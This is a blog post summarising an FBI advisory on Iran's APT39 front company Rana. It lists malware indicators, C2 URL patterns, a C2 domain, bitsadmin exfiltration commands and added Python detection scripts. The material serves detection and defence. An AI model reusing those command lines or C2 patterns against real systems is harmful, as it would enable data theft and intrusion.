
FBI releases Rana Intelligence Computing indicators of compromise (IOCs)

January 14, 2021 by Beth Osborne

Introduction

The FBI’s Cyber Division recently disclosed that Iran’s intelligence agency is employing nation-state actors and a front company, Rana Intelligence Computing, to conduct a years-long malware campaign. The FBI identifies these actors as Advanced Persistent Threat 39 (APT 39), also tracked as Chafer, Remexi, Cadelspy or ITG07. The release provided indicators of compromise (IOCs).

In this post, we’ll unpack the FBI Internet Crime Complaint Center (IC3) Flash release, documenting interesting findings regarding IOCs and IOC security.

What is Rana Intelligence Computing Company?

The Rana Intelligence Computing Company (Rana Corp.) is a Ministry of Intelligence and Security (MOIS) front company in Tehran, Iran. The entity, known by other names as listed above, conducts malicious cyber activity, including malware

Who is Rana Corp. targeting?

According to the FBI Flash alert, the group targets victims both globally and within Iran. Targets include hundreds of entities and individuals across 30 countries in Asia, Africa, Europe and North America. In the US, the group attempted to infect 15 companies, mostly in the travel industry, in order to track the movements of individuals MOIS deems a threat.

Another major target was telecom companies, which are attractive to those seeking to carry out surveillance. That set includes internet service providers (ISPs), which are not infallible: nation-state actors can use these ISPs to steal and monitor data.

Within Iran, Rana used malicious intrusion tools to target and monitor Iranian citizens and dissidents at the behest of MOIS. These individuals include journalists, former government employees, environmentalists, refugees, university students, university faculty and employees at international non-governmental organizations. Additionally, Rana targeted private sector companies in Iran.

What was Rana’s goal?

Based on intelligence and information about targets, Rana’s objectives seem to be multi-pronged: to monitor those MOIS considered a threat, and to harass, repress and exploit them. In the case of tracked individuals, MOIS operatives often located the person and placed them under arrest, where they underwent physical and psychological abuse.

What is the impact of Rana’s malware activities?

The FBI estimates these malware attacks cost “millions of dollars” to companies in the US and abroad. The FBI did not provide exact numbers. In response to the malware campaigns, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on the malicious actors under the names of APT 39, Cadelspy, Chafer, ITG07, Remexi and 45 other individuals tied to MOIS.

Why did the FBI make the malicious code public?

The FBI notified affected businesses that they had been targeted, so why make the code public? The motive was to cripple MOIS. The advisory stated:

“Until now, most of these technical indicators have never been publicly discussed, nor attributed to the MOIS by the U.S. government. It is anticipated that by making this malicious code public, it will deal a significant blow to the MOIS and mitigate the ongoing victimization of thousands of individuals and organizations around the world, while also imposing risk and consequences on our cyber adversaries.”

What are the IOCs associated with Rana?

The FBI provided specific IOCs associated with Rana so that organizations can evaluate whether they were a target. The FBI also uploaded samples of the malware to VirusTotal for independent analysis.

Visual Basic Script (VBS) malware

Rana used several VBS scripts embedded in Microsoft Office documents. Rana operatives then sent these documents to targets using spearphishing or social engineering tactics. If the victim opened the document, it dropped two scripts that uploaded and downloaded victim data and fetched additional malware.

VBS IOCs

The FBI provided these signatures to detect the VBS malware presence:

  • Files located in the following paths:
    • %userprofile%\appdata\local\Microsoft\Feed\dn
    • %userprofile%\appdata\local\Microsoft\Feed\up
  • Text (script) files named with a single letter followed by numbers (for example, K1234.vbs) that had actor infrastructure embedded.
  • Unusual scheduled tasks that run every two minutes and execute the .vbs script, under the task names UpdatMachine and UpdateMachineG.
  • The VBS malware traffic samples included:
    • Request: TCP and dport 80 and contains /update.php?req=
    • Response: TCP and sport 80 and begins with GET /update.php?req=(.*)&m=[bdu] HTTP/1.1
    • Request: TCP and dport 80 and contains update.php?req=.*&m=d
    • Response: MZ.*

See the IC3 advisory for the YARA rule for detection. 

AutoIt malware

Rana also used AutoIt malware scripts. This malware was also delivered via Microsoft Office documents or malicious links sent via phishing techniques. It worked much the same as the VBS malware: it created two new directories and used PowerShell commands to run specific files.

AutoIt IOCs

The FBI offered the following signatures to detect the AutoIt malware’s presence:

  • Files located in the following path:
    • %userprofile%\appdata\local\Microsoft\Feed\dn
    • %userprofile%\appdata\local\Microsoft\Feed\up
    • %userprofile%\appdata\local\Microsoft\Feed\te
  • Modifications to registry key:
    • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion
  • C2 traffic of the format:
    • http://<server>/update.php?req=<victim identifier>&m=b
    • http://<server>/update.php?req=<victim identifier>&m=d
    • http://<server>/update.php?req=<victim identifier>&m=u
    • http://<server>/update.php?req=<victim identifier>&m=d&b3=1
    • http://<server>/update.php?req=<victim identifier>&m=b&b3=1
    • http://<server>/update.php?req=<victim identifier>&m=u&b3=1

See the IC3 advisory for the YARA rules for detection. 
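As an added example (not part of the FBI Flash or this post), the following Python scanner applies the VBS and AutoIt indicators above to constructed proxy log lines, file paths and scheduled-task names; the log format, host names and victim identifier are assumptions.

```python
import re

# Constructed sample proxy log lines ("METHOD host path"); not taken from the advisory.
SAMPLE_PROXY_LOG = [
    "GET 198.51.100.10 /update.php?req=WS-7A3F&m=b",
    "GET 198.51.100.10 /update.php?req=WS-7A3F&m=d&b3=1",
    "GET www.example.org /update.php?req=abc&m=x",  # mode letter outside [bdu]
    "GET www.example.org /feeds/update.php",         # no req= parameter at all
]

# C2 request shape from the VBS/AutoIt IOC lists:
# /update.php?req=<victim identifier>&m=[bdu], optionally followed by &b3=1.
C2_REQUEST_RE = re.compile(
    r"/update\.php\?req=(?P<victim>[^&\s]+)&m=(?P<mode>[bdu])\b(?P<b3>&b3=1)?"
)
# Host artifacts from the same lists: the Feed\dn, \up and \te directories,
# scripts named <letter><digits>.vbs, and the two scheduled-task names.
FEED_DIR_RE = re.compile(r"\\appdata\\local\\microsoft\\feed\\(dn|up|te)(\\|$)", re.IGNORECASE)
DROPPER_SCRIPT_RE = re.compile(r"^[A-Za-z]\d+\.vbs$")
SUSPECT_TASK_NAMES = {"UpdatMachine", "UpdateMachineG"}


def scan_proxy_log(lines):
    """Return one record per log line whose path matches the update.php C2 pattern."""
    hits = []
    for line in lines:
        m = C2_REQUEST_RE.search(line)
        if m:
            hits.append({"victim": m["victim"], "mode": m["mode"], "b3": m["b3"] is not None})
    return hits


def scan_paths(paths):
    """Flag files inside the Feed dn/up/te directories or named like K1234.vbs."""
    flagged = []
    for path in paths:
        name = path.rsplit("\\", 1)[-1]
        if FEED_DIR_RE.search(path) or DROPPER_SCRIPT_RE.match(name):
            flagged.append(path)
    return flagged


def scan_scheduled_tasks(task_names):
    """Return the scheduled-task names that match those listed in the advisory."""
    return sorted(name for name in task_names if name in SUSPECT_TASK_NAMES)
```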

BITS 1.0 malware

The BITS 1.0 malware seems to have worked with the VBS and AutoIt malware. The VBS and/or the AutoIt malware pulled down the BITS 1.0 malware from actor-controlled infrastructure to cause more damage.

BITS 1.0 malware IOCs

The FBI presented the below signatures to detect the BITS 1.0 malware’s presence:

  • DNS resolution to obscure IP addresses, specifically 65.65.65.X, 76.76.76.76 and 61.61.X.X.
  • Snort rule that alerts on TCP packets from any IP and any port to any IP on port 80 that contain the string BITS: alert tcp any any -> any 80 (msg:"BITS content"; content:"BITS"; sid:1002351; rev:1;)
  • BITS 1.0 malware traffic samples:
    • Request: TCP and dport 80 and contains the string asp.asp\?ui=
    • Response: TCP and sport 80 and stream is NOK

See the IC3 advisory for the YARA rules for detection.

BITS 2.0 malware

A variant of the BITS 1.0 malware also exists. This malware employed similar communication channels as BITS 1.0 but different technical details. 

BITS 2.0 malware IOCs

The FBI derived these signatures to detect the BITS 2.0 malware’s presence:

  • Egresses data to the following: <url>/test.asp?name=<opname_from_config>_<computer_name>_<mac_address>_<filename>.bak.zak&q=<zipfile data>
  • Traffic used: bitsadmin.exe 5
  • Does a GET request to: <url>/checkupdate.asp?uname=<username>&pid=<opname>
  • Modifies registry key:
    • Software\Microsoft\Internet Explorer\Main
      • Subkey: DisableFirstRunCustomize set to 1
  • Creates a folder: C:\Users\<username>\AppData\Local\Microsoft\Events in which Events.vbs resides.
  • BITS communications:
    • bitsadmin.exe /TRANSFER SecurityCenterUpdate /DOWNLOAD /PRIORITY normal <url> <local filepath>
    • bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal <url> <local filepath>
    • URL: <url>/<opname>_<computer name>_<mac address>_<filename>
  • BITS 2.0 malware traffic samples included:
    • Request: TCP and dport 80 and contains /test.asp
    • Response: TCP and sport 80 and stream begins with name=.*\.*bak\.zak&q=
    • Response: TCP and stream contains Rar!.*\.bak\.zak\x0A

See the IC3 advisory for the YARA rules for detection.
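The BITS 2.0 indicators above (the two bitsadmin job names, the test.asp egress name and the upload URL naming) as an added Python example that is not taken from the advisory; the process-creation command lines, the C2 address and the victim values are constructed.

```python
import re

# Constructed process-creation command lines and egress URL; not taken from the advisory.
SAMPLE_PROCESS_LOG = [
    r"C:\Windows\System32\bitsadmin.exe /TRANSFER SecurityCenterUpdate /DOWNLOAD /PRIORITY normal "
    r"http://198.51.100.10/ld.dat C:\Users\bob\AppData\Local\Microsoft\Events\ld.dat",
    r"bitsadmin /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "
    r"http://198.51.100.10/OP7_DESKTOP-01_00-1A-2B-3C-4D-5E_notes.txt C:\Users\bob\notes.txt",
    r"bitsadmin.exe /TRANSFER WindowsUpdateJob /DOWNLOAD /PRIORITY normal http://download.example.org/kb.msu C:\Temp\kb.msu",
]
SAMPLE_EGRESS_URL = ("http://198.51.100.10/test.asp?name="
                     "OP7_DESKTOP-01_00-1A-2B-3C-4D-5E_report_q1.docx.bak.zak&q=UEsDBBQAAAAIAA")

# bitsadmin transfers that use the two job names listed as BITS 2.0 IOCs.
BITS_JOB_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+/TRANSFER\s+(?P<job>SecurityCenterUpdate|HelpCenterUpload)"
    r"\s+/(?P<direction>DOWNLOAD|UPLOAD)\s+/PRIORITY\s+\S+\s+(?P<url>\S+)\s+(?P<local>.+?)\s*$",
    re.IGNORECASE)
# Victim naming shared by the upload URL and the test.asp egress name:
# <opname>_<computer name>_<mac address>_<filename>
VICTIM_NAME_RE = re.compile(r"^(?P<opname>[^_]+)_(?P<computer>[^_]+)_(?P<mac>[^_]+)_(?P<filename>.+)$")
EGRESS_RE = re.compile(r"/test\.asp\?name=(?P<name>[^&]+)\.bak\.zak&q=")


def scan_bitsadmin_commands(lines):
    """Return job, direction, remote URL and local path for each command line that matches."""
    hits = []
    for line in lines:
        m = BITS_JOB_RE.search(line)
        if m:
            hits.append({"job": m["job"], "direction": m["direction"].upper(),
                         "url": m["url"], "local": m["local"]})
    return hits

def parse_victim_name(name):
    """Split <opname>_<computer>_<mac>_<filename> into its fields, or return None."""
    m = VICTIM_NAME_RE.match(name)
    return m.groupdict() if m else None

def parse_egress_url(url):
    """Victim fields from a test.asp?name=<...>.bak.zak&q= egress URL, or None."""
    m = EGRESS_RE.search(url)
    return parse_victim_name(m["name"]) if m else None

def parse_upload_url(url):
    """Victim fields from the last path segment of a HelpCenterUpload URL, or None."""
    return parse_victim_name(url.rsplit("/", 1)[-1])
```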

Firefox malware

The FBI also identified malware masquerading as legitimate Mozilla Firefox. The malware, 1.exe, contained various files and functions, including CrachReport.exe, Logging.dll, MozillaFirefox.exe, MozillaUpdate.exe and SafeBrowser.exe.

Firefox malware IOCs

To detect the Mozilla Firefox malware’s presence, the FBI provided these signatures:

  • Two files created in C:\Users\user\AppData\Local\MozillaFirefox\Config
    • txt: Contains formatted date string
    • txt: Contains randomly generated numerical string
  • C:\Users\user\AppData\Local\MozillaFirefox\Cache (contains screenshot data)
  • C:\Users\user\AppData\Local\MozillaFirefox\Extensions (contains keylogs)
  • FTP traffic that matches the following: u_ex<number>-<numerical string>-<year>_<month>_<day>_<hour>_<minute>_<second>.gzn

See the IC3 advisory for the YARA rules for detection.

Python-based malware

Rana delivered malware via Python, with a .rar file containing a script named ma.py. When it ran, the file conducted an HTTP GET request to a command-and-control server conforming to [Actor IP]/service.html. 

This GET request then downloaded additional malicious files to the victim machine. The malware could issue further HTTP GET requests, obtain device data, compress and AES-encrypt the collected data and then send it to the malicious C2 server. It could also record audio and take photos by accessing the microphone and camera.

Python-based malware IOCs

  • The malware traffic signature for this set is TCP and dport=80 and stream starts with err0701. 

See the IC3 advisory for the YARA rules for detection.

Android malware

Rana used an Android malware named optimizer.apk. This Android Package (APK) implant was a variant of Android malware. The malware communicated with a C2 server, saveingone.com, which previously resolved to an Iranian IP address. The APK was able to steal information and remotely access the Android device.

Android malware IOCs

To detect whether the Optimizer implant application was running on a device, check Settings -> Apps -> Running. Network indicators for the implant:

  • The implant sent a Domain Name Service (DNS) request to resolve the C2 domain, saveingone.com.
  • HTTP GET requests formed to retrieve an unknown type of data from the malicious C2.
  • The implant used HTTP POST requests to send AES-encrypted zipped data to the C2. The POST requests ran in a loop and continuously collected the device data.

See the IC3 advisory for the YARA rules for detection.

Depot.dat malware

Depot.dat can collect victim screenshots, keylogger output and other data, and then send it to the Rana-controlled infrastructure. The malware had two components: a dropper and an encrypted Microsoft CAB file named depot.dat. The CAB file contains four files (Bootmgr.dll, bootui.dll, mlp.dat and tfd.log) that make up a second malware stage. The dropper decrypts the CAB file to establish persistence, using a password supplied at runtime.

Depot.dat IOCs

The following signatures are useful for detecting the Depot.dat malware’s presence:

  • Known filenames:
    • Dropper: installer.exe, svchost.exe
    • depot.dat
  • Both observed sample contents begin with 2300, but the dropper code would support files starting with 2640 or MSCF with an approximate size of 59k.
  • Second stage directory paths:
    • C:\Windows\system32\Bootui.dll
    • C:\Windows\system32\Bootmgr.dll
    • C:\Windows\system32\Tfd.log
    • C:\Windows\system32\Mlp.dat
  • Directory paths for victim data:
    • C:\Windows\Help\OEM
    • C:\Windows\debug\WIA
  • Victim data:
    • Stored in one of the above paths, named <timestamp>.tmp and begins with 2300.
  • Altered registry keys:
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, specifically LoadAppInit_DLLs to include Bootmgr.dll and RequireSigned to be off.

See the IC3 advisory for the YARA rules for detection.
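An added Python example (not from the advisory or this post) that parses a constructed reg export of the Windows key listed above and classifies a candidate depot.dat by its leading bytes. It assumes that the advisory’s "LoadAppInit_DLLs to include Bootmgr.dll" refers to the AppInit_DLLs list with LoadAppInit_DLLs enabled, that "RequireSigned" is the RequireSignedAppInit_DLLs value, and that 2300, 2640 and MSCF are ASCII markers as written.

```python
# Constructed excerpt of a "reg export" of the key named in the IOC list; not from the advisory.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Windows\\system32\\Bootmgr.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000
"""
WINDOWS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
# Leading bytes from the IOC list, treated here as ASCII markers (assumption).
OBSERVED_MAGIC = (b"2300",)
DROPPER_SUPPORTED_MAGIC = (b"2640", b"MSCF")


def parse_reg_export(text):
    """Minimal .reg parser: returns {key: {value name: str or int}} for string and dword values."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, raw = line[1:].partition('"=')
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[len("dword:"):], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                keys[current][name] = raw[1:-1].replace("\\\\", "\\")  # .reg doubles backslashes
    return keys


def appinit_findings(values):
    """Describe which of the AppInit-related IOC conditions hold for the Windows key values."""
    findings = []
    if "bootmgr.dll" in str(values.get("AppInit_DLLs", "")).lower():
        findings.append("AppInit_DLLs references Bootmgr.dll")
    if values.get("LoadAppInit_DLLs") == 1:
        findings.append("LoadAppInit_DLLs enabled")
    if values.get("RequireSignedAppInit_DLLs") == 0:
        findings.append("RequireSignedAppInit_DLLs disabled")
    return findings


def depot_header_status(data):
    """Classify a candidate depot.dat by its leading bytes and the ~59k size noted in the IOCs."""
    if data.startswith(OBSERVED_MAGIC):
        kind = "observed"            # both samples in the advisory began this way
    elif data.startswith(DROPPER_SUPPORTED_MAGIC):
        kind = "dropper-supported"   # accepted by the dropper code per the advisory
    else:
        return None
    # The 50k-70k tolerance around "approximate size of 59k" is an assumption.
    return {"kind": kind, "size_plausible": 50_000 <= len(data) <= 70_000}
```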

IOC security takeaways

While this release certainly illustrates Iran’s spying and monitoring network, it’s not the first time, nor will it be the last. The threat is ongoing and any organization should practice IOC security best practices. 

Protections for ISP hacking

ISPs are hackable, as this example shows. Securing your data and communication channels is imperative. There are many touchpoints that may be weak as data travels across the internet, and the best way to protect against this is to employ encryption.

Public key infrastructure (PKI) is a feasible way to protect data even in a compromised ISP. An IOC security best practice would be to use the HTTPS protocol and S/MIME certificates for end-to-end encryption. 

TLS certificates ensure that all connections occur under HTTPS, preventing eavesdroppers and man-in-the-middle (MitM) attackers from accessing plaintext information.

S/MIME certificates digitally sign and encrypt email. Even if someone intercepted the messages, they would need your organization’s individual private keys to decrypt and read them.

Other network security best practices

  • Always update applications when new versions are available, regardless of how small the update is or whether the vendor requires it.
  • Establish an offline backup of servers that are “known good” with a file integrity system.
  • Adopt user input validation to restrict local and remote file inclusion vulnerabilities.
  • Configure webserver security, disabling or blocking all unnecessary services.
  • Leverage a reverse proxy or alternative service to restrict accessible URL paths to known legitimate ones. 
  • Conduct vulnerability scans regularly.
  • Deploy firewalls.
  • Perform regular virus checks, application fuzzing, code reviews and server network analysis. 

Stay current on IOCs

It’s a good idea to always stay up to date on IOCs, whether distributed by the FBI’s Cyber Division or other government entities. You can subscribe to the FBI’s email updates. These updates keep you aware of known IOCs, so you can then verify there has been no compromise of your network.


Sources

Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07, FBI Flash

Treasury Sanctions Cyber Actors Backed by Iranian Intelligence Ministry, US Department of the Treasury
